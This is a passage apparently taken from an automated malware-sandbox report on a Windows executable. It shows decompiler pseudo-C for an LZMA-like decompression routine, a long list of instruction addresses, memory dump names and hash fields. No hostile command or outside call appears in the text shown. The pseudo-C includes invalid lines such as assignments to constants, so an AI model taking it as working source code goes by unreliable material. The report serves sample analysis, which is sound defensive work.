															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                            0x00000000
                                                                            0x00406ce2
                                                                            0x00406ce2
                                                                            0x00406ce6
                                                                            0x00406cf3
                                                                            0x00406cfd
                                                                            0x00000000
                                                                            0x00406ce8
                                                                            0x00406ce8
                                                                            0x00406d23
                                                                            0x00406d26
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d2c
                                                                            0x00406d2f
                                                                            0x00406d36
                                                                            0x00406d3b
                                                                            0x00406c1c
                                                                            0x00406c1f
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fe2
                                                                            0x00406fe6
                                                                            0x00407195
                                                                            0x004071ab
                                                                            0x004071b3
                                                                            0x004071ba
                                                                            0x004071bc
                                                                            0x004071c3
                                                                            0x004071c7
                                                                            0x004071c7
                                                                            0x00406ff2
                                                                            0x00406ff9
                                                                            0x00407001
                                                                            0x00407004
                                                                            0x00407007
                                                                            0x00407007
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067cc
                                                                            0x004067cf
                                                                            0x004067d2
                                                                            0x004067d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067dc
                                                                            0x004067df
                                                                            0x004067e1
                                                                            0x004067e2
                                                                            0x004067e5
                                                                            0x004067e7
                                                                            0x004067e8
                                                                            0x004067ea
                                                                            0x004067ed
                                                                            0x004067f2
                                                                            0x004067f7
                                                                            0x00406800
                                                                            0x00406813
                                                                            0x00406816
                                                                            0x00406822
                                                                            0x0040684a
                                                                            0x0040684c
                                                                            0x0040685a
                                                                            0x0040685a
                                                                            0x0040685e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x0040684e
                                                                            0x00406851
                                                                            0x00406852
                                                                            0x00406852
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x00406828
                                                                            0x0040682d
                                                                            0x0040682d
                                                                            0x00406836
                                                                            0x0040683e
                                                                            0x00406841
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406864
                                                                            0x00406864
                                                                            0x00406868
                                                                            0x00407114
                                                                            0x00000000
                                                                            0x00407114
                                                                            0x00406871
                                                                            0x00406881
                                                                            0x00406884
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x0040688a
                                                                            0x0040688e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x00406896
                                                                            0x004068c0
                                                                            0x004068c6
                                                                            0x004068cd
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x0040689c
                                                                            0x0040689f
                                                                            0x004068a4
                                                                            0x004068a4
                                                                            0x004068af
                                                                            0x004068b7
                                                                            0x004068ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068ff
                                                                            0x00406905
                                                                            0x00406908
                                                                            0x00406915
                                                                            0x0040691d
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068d4
                                                                            0x004068d8
                                                                            0x00407123
                                                                            0x00000000
                                                                            0x00407123
                                                                            0x004068e4
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068f2
                                                                            0x004068f5
                                                                            0x004068f8
                                                                            0x004068fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406925
                                                                            0x00406927
                                                                            0x0040692a
                                                                            0x0040699b
                                                                            0x0040699e
                                                                            0x004069a1
                                                                            0x004069a8
                                                                            0x004069b2
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x0040692c
                                                                            0x00406930
                                                                            0x00406933
                                                                            0x00406935
                                                                            0x00406938
                                                                            0x0040693b
                                                                            0x0040693d
                                                                            0x00406940
                                                                            0x00406942
                                                                            0x00406947
                                                                            0x0040694a
                                                                            0x0040694d
                                                                            0x00406951
                                                                            0x00406958
                                                                            0x0040695b
                                                                            0x00406962
                                                                            0x00406966
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x00406993
                                                                            0x00406995
                                                                            0x00000000
                                                                            0x00406977
                                                                            0x00406977
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406980
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x00406988
                                                                            0x0040698a
                                                                            0x0040698b
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x00406bc4
                                                                            0x00406bc8
                                                                            0x00406be6
                                                                            0x00406be9
                                                                            0x00406bf0
                                                                            0x00406bf3
                                                                            0x00406bf6
                                                                            0x00406bf9
                                                                            0x00406bfc
                                                                            0x00406bff
                                                                            0x00406c01
                                                                            0x00406c08
                                                                            0x00406c09
                                                                            0x00406c0b
                                                                            0x00406c0e
                                                                            0x00406c11
                                                                            0x00406c14
                                                                            0x00406c14
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00406c19
                                                                            0x00406bca
                                                                            0x00406bcd
                                                                            0x00406bd0
                                                                            0x00406bda
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406c2e
                                                                            0x00406c32
                                                                            0x00406c55
                                                                            0x00406c58
                                                                            0x00406c5b
                                                                            0x00406c65
                                                                            0x00406c34
                                                                            0x00406c34
                                                                            0x00406c37
                                                                            0x00406c3a
                                                                            0x00406c3d
                                                                            0x00406c4a
                                                                            0x00406c4d
                                                                            0x00406c4d
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406c71
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c7b
                                                                            0x00406c7f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c85
                                                                            0x00406c87
                                                                            0x00406c8b
                                                                            0x00406c8b
                                                                            0x00406c8e
                                                                            0x00406c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d09
                                                                            0x00406d0d
                                                                            0x00406d14
                                                                            0x00406d17
                                                                            0x00406d1a
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d1d
                                                                            0x00406d20
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dc9
                                                                            0x00406dc9
                                                                            0x00406dcd
                                                                            0x0040716b
                                                                            0x00000000
                                                                            0x0040716b
                                                                            0x00406dd3
                                                                            0x00406dd6
                                                                            0x00406dd9
                                                                            0x00406ddd
                                                                            0x00406de0
                                                                            0x00406de6
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406deb
                                                                            0x00406dee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069be
                                                                            0x004069be
                                                                            0x004069c2
                                                                            0x0040712f
                                                                            0x00000000
                                                                            0x0040712f
                                                                            0x004069c8
                                                                            0x004069cb
                                                                            0x004069ce
                                                                            0x004069d2
                                                                            0x004069d5
                                                                            0x004069db
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069e0
                                                                            0x004069e3
                                                                            0x004069e3
                                                                            0x004069e6
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069fb
                                                                            0x004069fb
                                                                            0x004069ff
                                                                            0x00406a02
                                                                            0x00406a05
                                                                            0x00406a08
                                                                            0x00406a0b
                                                                            0x00406a0c
                                                                            0x00406a0f
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1a
                                                                            0x00406a1d
                                                                            0x00406a20
                                                                            0x00406a23
                                                                            0x00406a26
                                                                            0x00406a29
                                                                            0x00406a45
                                                                            0x00406a48
                                                                            0x00406a4b
                                                                            0x00406a4e
                                                                            0x00406a55
                                                                            0x00406a59
                                                                            0x00406a5b
                                                                            0x00406a5f
                                                                            0x00406a2b
                                                                            0x00406a2b
                                                                            0x00406a2f
                                                                            0x00406a37
                                                                            0x00406a3c
                                                                            0x00406a3e
                                                                            0x00406a40
                                                                            0x00406a40
                                                                            0x00406a62
                                                                            0x00406a69
                                                                            0x00406a6c
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a77
                                                                            0x00406a77
                                                                            0x00406a7b
                                                                            0x0040713b
                                                                            0x00000000
                                                                            0x0040713b
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a87
                                                                            0x00406a8b
                                                                            0x00406a8e
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a99
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406aa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aaa
                                                                            0x00406aad
                                                                            0x00406ab0
                                                                            0x00406ab3
                                                                            0x00406ab6
                                                                            0x00406ab9
                                                                            0x00406abc
                                                                            0x00406abf
                                                                            0x00406ac2
                                                                            0x00406ada
                                                                            0x00406add
                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f81
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00000000
                                                                            0x0040704f
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d60
                                                                            0x00406d62
                                                                            0x00406d64
                                                                            0x00406d64
                                                                            0x00406d65
                                                                            0x00406d68
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407065
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x00000000
                                                                            0x004071a1
                                                                            0x0040706f
                                                                            0x00407072
                                                                            0x00407075
                                                                            0x00407079
                                                                            0x0040707c
                                                                            0x00407082
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x004070f1
                                                                            0x004070f4
                                                                            0x004070f9
                                                                            0x004070fa
                                                                            0x004070fc
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00407013
                                                                            0x0040700d
                                                                            0x00407093
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b1
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070da
                                                                            0x004070dc
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070be
                                                                            0x004070c3
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070e3
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406cd3
                                                                            0x00406cd3
                                                                            0x00000000
                                                                            0x00406cd3
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004071c0
                                                                            0x004071c0
                                                                            0x00000000
                                                                            0x004071c0
                                                                            0x0040700d
                                                                            0x00406f94
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406ce6

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                                            • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                                                                            • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                                            • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
